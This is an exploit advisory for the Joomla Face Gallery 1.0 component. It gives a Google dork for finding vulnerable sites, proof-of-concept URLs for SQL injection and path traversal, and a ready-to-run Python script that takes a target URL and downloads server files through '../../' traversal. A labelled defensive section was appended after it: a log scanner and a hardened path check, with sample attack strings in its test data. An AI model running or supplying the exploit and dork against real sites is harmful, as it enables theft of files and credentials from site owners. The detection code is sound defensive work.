######################

# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150

# Dork Google: inurl:option=com_facegallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

# Info:

# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file download vulnerabilities

# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]

# "aid" and img_name variables are not sanitized.

######################

# Arbitrary file download exploit:

#!/usr/bin/env python

# http connection
import urllib, urllib2
# Args management
import optparse
# Error management
import sys

banner = """
j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

def connection(url,pathtrav):
    try:
        response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
        content = response.read()
        if content != "":
            print '[!] VULNERABLE'
            print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
        else:
            print '[X] Not Vulnerable'
    except urllib2.HTTPError:
        print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = "../../"

connection(url,pathtrav)
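The two unsanitized parameters named above, img_name (path traversal) and aid (SQL injection), are what a defender would hunt for in web-server logs and what a fixed download handler must confine. The Python 3 script below is an added example and is not part of the original advisory or the Face Gallery component: it flags com_facegallery requests whose img_name is not a bare file name or whose aid is not numeric, and shows the path-confinement check a patched imageDownload handler needs. The access-log lines, the gallery directory and the function names are constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache-style access-log lines (sample data, not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2014:10:00:01 +0000] "GET /index.php?option=com_facegallery&view=images&aid=12&lang=en HTTP/1.1" 200 5120
10.0.0.9 - - [17/Sep/2014:10:00:02 +0000] "GET /index.php?option=com_facegallery&task=imageDownload&img_name=photo1.jpg HTTP/1.1" 200 81234
10.0.0.7 - - [17/Sep/2014:10:00:03 +0000] "GET /index.php?option=com_facegallery&task=imageDownload&img_name=../../configuration.php HTTP/1.1" 200 3021
10.0.0.7 - - [17/Sep/2014:10:00:04 +0000] "GET /index.php?option=com_facegallery&view=images&aid=12%27&lang=en HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def is_bare_filename(name):
    """True only if name has no directory part (either separator) and is not '', '.' or '..'."""
    return name not in ("", ".", "..") and "\\" not in name and PurePosixPath(name).name == name

def analyze_request(path):
    """Return (kind, value) findings for one request path; empty if it looks benign."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    if qs.get("option") != ["com_facegallery"]:
        return []
    findings = []
    for raw in qs.get("img_name", []):
        name = unquote(raw)  # second decode catches double-encoded ../ sequences
        if not is_bare_filename(name):
            findings.append(("traversal", name))
    for raw in qs.get("aid", []):
        if not raw.isdigit():  # the component expects a numeric album id
            findings.append(("sqli_suspect", raw))
    return findings

def scan_log(text):
    """Run analyze_request over every log line; return (client_ip, kind, value) hits."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            for kind, value in analyze_request(match.group(1)):
                hits.append((line.split()[0], kind, value))
    return hits

def safe_image_path(gallery_dir, img_name):
    """Hardened handler logic: only a bare file name inside gallery_dir is served."""
    if not is_bare_filename(img_name):
        raise ValueError("rejected image name: %r" % img_name)
    return str(PurePosixPath(gallery_dir) / img_name)
```

Running scan_log over real logs in the same way lists the client IP and the offending parameter value for each suspicious request, and safe_image_path raises on every value the traversal check flags.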